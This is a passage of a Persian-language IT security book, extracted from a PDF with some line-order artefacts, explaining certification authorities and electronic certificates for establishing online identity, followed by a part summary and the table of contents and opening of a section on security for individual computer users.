ﺩﺍﺩﻥ ﻣﺎ .ﺩﺭ ﻏﻴﺎﺏ ﺍﻃﻼﻋﺎﺕ ﺣﺘـﻲ ﺩﻳﮕـﺮ ﻧﻤـﻲﺩﺍﻧـﻴﻢ ﻛـﻪ ﺁﻳـﺎ
ﻧﻮﻳﺴﻨﺪﺓ ﻳﻚ ﭘﻴﺎﻡ ﻫﻤﺎﻥ ﺷﺨﺼﻲ ﺍﺳﺖ ﻛﻪ ﺧﻮﺩﺵ ﺍﺩﻋﺎﻱ ﺁﻧﺮﺍ
ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ.
ﻣﺴﻠﻢ ﺍﺳﺖ ﻛﻪ ﻓﺮﻳﺒﻜﺎﺭﻱ ﺩﺭ ﺟﻬﺎﻥ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﺭﺥ ﻣـﻲ ﺩﻫـﺪ،
ﻻ ﺗﻌﻴـﻴﻦ ﺣﻘﻴﻘـﺖ ﺩﺭ ﺷـﺮﺍﻳﻄﻲ ﻛـﻪ ﺍﻓـﺮﺍﺩ ﺑـﺼﻮﺭﺕ
ﻭﻟﻲ ﻣﻌﻤﻮ ﹰ
ﻓﻴﺰﻳﻜﻲ ﻭ ﻣﻜﺎﻧﻬﺎ ﺑﺼﻮﺭﺕ ﻭﺍﻗﻌﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ.
ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﺍﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ٦٥ﺑـﻪ ﺍﻳـﻦ ﺑﻌـﺪ ﺍﺯ
ﺍﻣﻨﻴﺖ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﺯﻳﺎﺩﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﻣﺮﺍﻛﺰ ﺑـﺮﺍﻱ
ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﻃـﻮﺭ ﺭﺳـﻤﻲ ﮔـﻮﺍﻫﻲ ﺻـﺎﺩﺭ
ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻣﻔﻬـﻮﻡ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ :ﺍﮔـﺮ
ﮔﺬﺭﻧﺎﻣﺔ ﻣﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻳﻌﻨﻲ ﺩﻭﻟﺖ ﻳﻚ ﻛﺸﻮﺭ ﻫﻮﻳﺖ ﺷـﻤﺎ
ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﺮﺩﻩ ﻭ ﻟﺬﺍ ﮔﺬﺭﻧﺎﻣﻪ ﻧﺸﺎﻧﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﻴـﺪ
ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺧﻮﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺍﮔﺮ
ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺳﻴﻠﺔ ﻧﻘﻠﻴﺔ ﻣﻮﺗﻮﺭﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ
ﻱ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ ﺷـﻤﺎ
ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﻣﻠـﻲ ﻳـﺎ ﻧﺎﺣﻴـﻪﺍ ﹺ
ﻣﺠﻮﺯﻱ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﻛﻪ ﻫﻢ ﻫﻮﻳﺖ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ ﻭ ﻫـﻢ
ﺟﻮﺍﺯ ﺭﺍﻧﻨـﺪﮔﻲ ﺑـﺎ ﻳـﻚ ﻭﺳـﻴﻠﺔ ﻧﻘﻠﻴـﻪ ﺭﺍ ﺑـﻪ ﺷـﻤﺎ ﻣـﻲﺩﻫـﺪ.
ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺧﺪﻣﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻲﺩﻫﻨﺪ ﻧﻴـﺰ ﺍﺯ ﻃﺮﻳـﻖ
ﺻﺪﻭﺭ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣـﻲﻧﻤﺎﻳﻨـﺪ .ﻛﺎﺭﻓﺮﻣـﺎ ﻳـﺎ
ﺁﻣﻮﺯﺷﮕﺎﻩ ﺷﻤﺎ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﺭﺕ ﺷﻨﺎﺳـﺎﻳﻲ
ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ ﻭ ﺁﻥ ﻛﺎﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺳﺘﺮﺳﻲ ﺷﻤﺎ ﺭﺍ ﺑـﻪ
ﺳﺮﻭﻳﺴﻬﺎﻱ ﺧﺎﺻﻲ ﻛﻪ ﻣﺨﺼﻮﺹ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻳـﺎ ﺩﺍﻧـﺸﺠﻮﻳﺎﻥ
ﻳﻚ ﺣﻮﺯﺓ ﺧﺎﺹ ﻫﺴﺘﻨﺪ ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﺪ.
ﻣﺮﻛﺰ ﺗﺎ ﻣﺮﻛﺰ ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ؛ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺑﻪ ﺍﺛﺒﺎﺕ ﻛﺎﻣﻞ ﻫﻮﻳﺖ ﺷﻤﺎ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺩﺭﺣﺎﻟﻴﻜﻪ ﺳﺎﻳﺮﻳﻦ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﭽﻪ ﻛﻪ ﺑﻴﺎﻥ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺑﭙﺬﻳﺮﻧﺪ.
ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﻳـﻦ ﻣﺸﺨـﺼﺎﺕ ﺭﺍ ﺑـﻪ
ﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ .ﺳﻄﻮﺡ ﻣﺘﻌﺪﺩ ﺗﺄﻳﻴﺪ ﻫﻮﻳـﺖ ﺑـﺮﺍﻱ ﺩﺭﺟـﺎﺕ
ﻣﺨﺘﻠﻒ ﺍﻃﻤﻴﻨﺎﻥ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﮔﻮﺍﻫﻴﻬﺎ ﺗﻨﻬـﺎ
ﺩﺭ ﺳﻄﺢ ﺧﻮﺩ ﻣﻌﺘﺒﺮ ﻣﻲﺑﺎﺷﻨﺪ .ﻟﺬﺍﺳﺖ ﻛﻪ ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﻭﺟﻮﺩ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑـﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ
ﺑﻪ ﺗﻤﺎﻣﻲ ﺍﻫﺪﺍﻑ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻛـﺎﻓﻲ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﭼﻨـﺪﻳﻦ ﻣﺮﻛـﺰ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺑـﺎ
ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﮔــﻮﺍﻫﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،٦٦ﺍﻳــﻦ ﮔﻮﺍﻫﻴﻬــﺎ ﻣــﻲﺗﻮﺍﻧﻨــﺪ
ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﻀﺎ ﺷﻮﻧﺪ ﻭ ﺍﻳﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ
ﻛــﻪ ﮔــﻮﺍﻫﻲ ﻣﻨﺘﻘــﻞ ﺷــﺪﻩ ﺻــﺤﻴﺢ ﻭ ﺣﻘﻴﻘــﻲ ﺍﺳــﺖ .ﺍﻳــﻦ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺗﺠﺮﺑﻲ ﻭ ﺷـﻬﻮﺩﻱ ﻛـﻪ
ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻣـﺴﺘﺤﻜﻢﺗـﺮ
ﻫﺴﺘﻨﺪ .ﺩﺭ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻋﺘﻤﺎﺩ ﻻﺯﻡ ﺟﻬـﺖ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣـﺎﻟﻲ
ﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ ﺭﻭﺷــﻬﺎﻱ
ﻣﺴﺘﺤﻜﻢﺗﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﺩﻭﻟﺘﻬﺎ ﺩﺭ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻭﺟﻮﺩ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﺑـﺮﺍﻱ
ﻛﺎﺭﺍﻳﻲ ﻭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﻣﺪﻟﻬﺎﻱ ﺟﺪﻳﺪ ﺍﻋﺘﻤﺎﺩ ﻧﻘﺶ
ﻣﻬﻤﻲ ﺩﺍﺭﻧﺪ .ﺍﻧﺠﺎﻡ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ
ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﺘﻪ ﺑﻪ ﻭﺟﻮﺩ ﺍﻳﻦ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ .ﺩﺭ ﺑﻌﻀﻲ
ﻛﺸﻮﺭﻫﺎ ﺩﻭﻟﺘﻬﺎ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ
ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻋﻤﻞ ﻛﻨﻨـﺪ ﻭ ﺩﺭ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ ﺩﻭﻟﺘﻬـﺎ
ﻣﻌﺘﻘﺪﻧﺪ ﻛـﻪ ﻭﻇﻴﻔـﺔ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺑﺎﻳـﺪ ﺑـﻪ ﺑﺨـﺶ
ﺧﺼﻮﺻﻲ ﻭﺍﮔﺬﺍﺭ ﺷﻮﺩ .ﻣﺴﺘﻘﻞ ﺍﺯ ﺟﺰﺋﻴﺎﺕ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ،ﻫﺪﻑ ﺍﺯ
ﺗﺄﺳﻴﺲ ﺍﻳﻦ ﻣﺮﺍﻛـﺰ ﻭﺍﺿـﺢ ﺍﺳـﺖ .ﺳﻴﺎﺳـﺖ ﺩﻭﻟـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺗﺴﻬﻴﻞ ﻛﻨﺪ ﺗﺎ ﺍﻓﺮﺍﺩ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ
ﻲ
ﻛــﺎﺭﺑﺮﺍﻥ ﻣﻨﻔــﺮﺩ ﺁﻥ ﻗــﺎﺩﺭ ﺑﺎﺷــﻨﺪ ﺩﺭ ﺗﺠــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــ ﹺ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﻫﻢ ﻣﺸﺎﺭﻛﺖ ﻧﻤﺎﻳﻨﺪ.
ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺍﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ
ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ .ﺑﻄﻮﺭ ﻛﻠﻲ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ ﺍﺯ ﺗﺄﻳﻴـﺪ ﺷـﻤﺎ
ﻫﺪﻑ ﺧﺎﺻﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ .ﺟﺎﻣﻌﻴﺖ ﺗﺄﻳﻴﺪ ﻫﻮﻳﺖ ﺍﺯ ﻳـﻚ
Certification Authorities
65
Electronic Certification
66
ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺟﻤﻊﺑﻨﺪﻱ
ﺗﻤﺎﻡ ﺍﻓﺮﺍﺩ ﻭ ﻛﺸﻮﺭﻫﺎ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻬﺮﻩ ﻣﻲﺟﻮﻳﻨـﺪ ،ﺍﻣـﺎ
ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺟﺎﺫﺑﺔ ﺧﺎﺻﻲ ﺩﺍﺭﺩ
ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﺁﻧﻬﺎ ﺩﺭ ﺟﺎﻣﻌﺔ ﺍﻗﺘـﺼﺎ ﺩ ﺟﻬـﺎﻧﻲ ﺭﺍ ﺗـﺴﺮﻳﻊ
ﻛﻨﺪ .ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﻫﻨﻮﺯ ﺩﺭ ﺁﻏﺎﺯ ﺭﺍﻩ ﺧـﻮﺩ ﺍﺳـﺖ ﻭﻟـﻲ ﺑـﺴﺮﻋﺖ
ﺩﺭﺣﺎﻝ ﭘﻴﺸﺮﻓﺖ ﻣﻲ ﺑﺎﺷﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺎﻧﻨﺪ ﺳـﺎﻳﺮ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ
ﻓﻨﺎﻭﺭﻱ ،ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻢ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻣـﺸﺮﻭﻉ ﻭ ﻫـﻢ
ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻧﺎﻣﺸﺮﻭﻉ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴـﺮﺩ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ
ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﺠﺮﻣﺎﻥ ﻭ ﺧﺮﺍﺑﻜـﺎﺭﺍﻧﻲ ﻭﺟـﻮﺩ
ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﻭ ﺳـﺎﺯﻣﺎﻧﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ.
ﻣﻔﻬﻮﻡ "ﺍﻳﻤﻨﻲ ﺳﺎﻳﺒﺮ" ﻳﻚ ﻣﻔﻬﻮﻡ ﻣﻬـﻢ ﺍﺳـﺖ .ﻣﺜﺎﻟﻬـﺎﻱ ﺍﻳـﻦ
ﻓﺼﻞ ،ﻣﻴﺰﺍﻥ ﻭﻗﺎﻳﻊ ﮔـﺰﺍﺭﺵﺷـﺪﻩ ﺑـﻪ ،CERTﻭ ﺭﺧـﺪﺍﺩﻫﺎﻱ
ﺟﺪﻳﺪﻱ ﻛﻪ ﺭﻭﺯﺍﻧﻪ ﺩﺭ ﻣﻄﺒﻮﻋـﺎﺕ ﮔـﺰﺍﺭﺵ ﻣـﻲﺷـﻮﻧﺪ ﻫﻤﮕـﻲ
ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛـﻪ ﭼـﺮﺍ ﺁﮔـﺎﻫﻲ ﺍﺯ ﻣﻮﺿـﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺣـﺎﺋﺰ
ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻭ ﭼﺮﺍ ﺑﺎﻳﺪ ﮔﺎﻣﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ،ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﺠﺎﺭﺕ ﺑﺮﺩﺍﺷﺖ.
ﺍﻳﻦ ﻛﺘﺎﺏ ﺣﺎﻭﻱ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﺍﻣﻨﻴﺖ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻮﻗﻌﻴﺖ
ﺧﺎﺹ ﺷﻤﺎ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ ﻛﻤﻚ ﻣﻲ ﻛﻨﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣﺮﺍﺟﻊ
ﭼﺎﭘﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﺮﺍﻭﺍﻧﻲ ﻛﻪ ﺩﺭ ﺑﺮ ﺩﺍﺭﻧﺪﻩ ﺍﺑﻌﺎﺩ ﺧﺎﺹ ﺍﻣﻨﻴﺖ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺷـﻜﻞ
ﺗﺨﺼﺼﻲ ﺑﺮ ﺭﻭﻱ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺗﻤﺮﻛـﺰ
ﺩﺍﺭﻧﺪ ﺭﺍ ﻣﻌﺮﻓـﻲ ﻣـﻲﻛﻨـﺪ .ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ ﻣﻨـﺎﺑﻊ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﻭ
ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﭘﻲ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺧﻮﺩ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺭ ﺟﻬﺎﻥ
ﺷﺒﻜﻪﺍﻱ ﻣﻲﺑﺎﺷﻨﺪ ﻣﻔﻴﺪ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺧﺎﺻـﻲ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺳﺮﻣﺎﻳﻪ ﮔـﺬﺍﺭﻱ ﻣـﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﻭ ﺍﻋﺘﻤـﺎﺩ ﻭ
ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺑـﺴﺘﮕﻲ ﺑـﻪ ﺳـﻄﺢ ﺍﻣﻨﻴـﺖ ﻭ
ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﻓﻨـﺎﻭﺭﻱ ﻭ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺁﻥ ﺩﺍﺭﺩ.
ﺩﻭﻟﺘﻬﺎ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﻫﻤﮕـﻲ ﻧﻘـﺶ ﺑـﺴﺰﺍﻳﻲ ﺩﺭ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳﺮﻣﺎﻳﻪ ﻫﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻛـﺸﻮﺭﻫﺎ
ﺍﻳﻔﺎ ﻣﻲﻛﻨﻨﺪ .ﺷﻨﺎﺧﺖ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺴﻴﺎﺭ ﺳﻮﺩﻣﻨﺪ ﺍﺳﺖ؛ ﻭ ﻋﻤﻠﻜﺮﺩ
ﻣﻨﺎﺳﺐ ﺑﺮ ﺍﺳﺎﺱ ﭼﻨﻴﻦ ﺷﻨﺎﺧﺘﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﻳـﻚ ﻣﺤـﻴﻂ ﻗﺎﺑـﻞ
ﺍﻃﻤﻴﻨﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﺩ ﺳﺎﻛﻨﺎﻥ ﻛﺮﺓ ﺯﻣﻴﻦ ﺗـﺎ ﺳـﺮﺣﺪ
ﺍﻣﻜﺎﻥ ﻓﻮﺍﻳﺪ ﻋﺼﺮ ﻧﻮﻳﻦ ﺩﻳﺠﻴﺘﺎﻝ ﺭﺍ ﺣﺲ ﻛﻨﻨﺪ.
ﺑﺨﺶ ﺍﻭﻝ
ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪ ﻭ ﻣﻬﻴﺠﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨـﺪ
ﻛﻪ ﻫﺮﻳﻚ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺭ ﺁﻣﻮﺯﺵ ،ﺑﻬﺪﺍﺷﺖ ،ﺭﻓـﺎﻩ،
ﺗﺠﺎﺭﺕ ﻭ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎﻱ ﺟﺎﻣﻌﺔ ﻣﺪﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
٤٣
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ
ﻓﺼﻞ .۲ﺩﺭﻙ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﱵ
ﻓﺼﻞ .۳ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ
ﻓﺼﻞ .۴ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ
ﻓﺼﻞ .۵ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﳐﺮﺏ
ﻓﺼﻞ .۶ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ
ﻓﺼﻞ .۷ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ
ﻓﺼﻞ .۸ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ
ﺿﻤﻴﻤﻪ .۱ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ
ﺿﻤﻴﻤﻪ.۲
TCP/IP
ﺿﻤﻴﻤﻪ .۳ﻭﺍﮊﻩﻧﺎﻣﻪ ﺍﺻﻄﻼﺣﺎﺕ ﻓﲏ
ﻓﺼﻞ ﺍﻭﻝ
ﻣﻘﺪﻣﻪ
ﺗﺄﻛﻴﺪ ﺑﺨﺶ ﺩﻭﻡ ﺑﻴﺸﺘﺮ ﺑﺮ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﺭﺍﻳﺎﻧـﻪ
ﺍﺳﺖ -ﺍﺯ ﻣﺒﺘﺪﻳﺎﻥ ﮔﺮﻓﺘﻪ ﺗﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ؛ ﻭ ﺍﻭﻟﻴﻦ ﻣﺴﺌﻠﻪﺍﻱ ﻛﻪ
ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺑﺎﻳــﺪ ﺷــﺮﺡ ﺩﺍﺩﻩ ﺷــﻮﺩ ﭼﮕــﻮﻧﮕﻲ ﺣﻔﺎﻇــﺖ ﺍﺯ
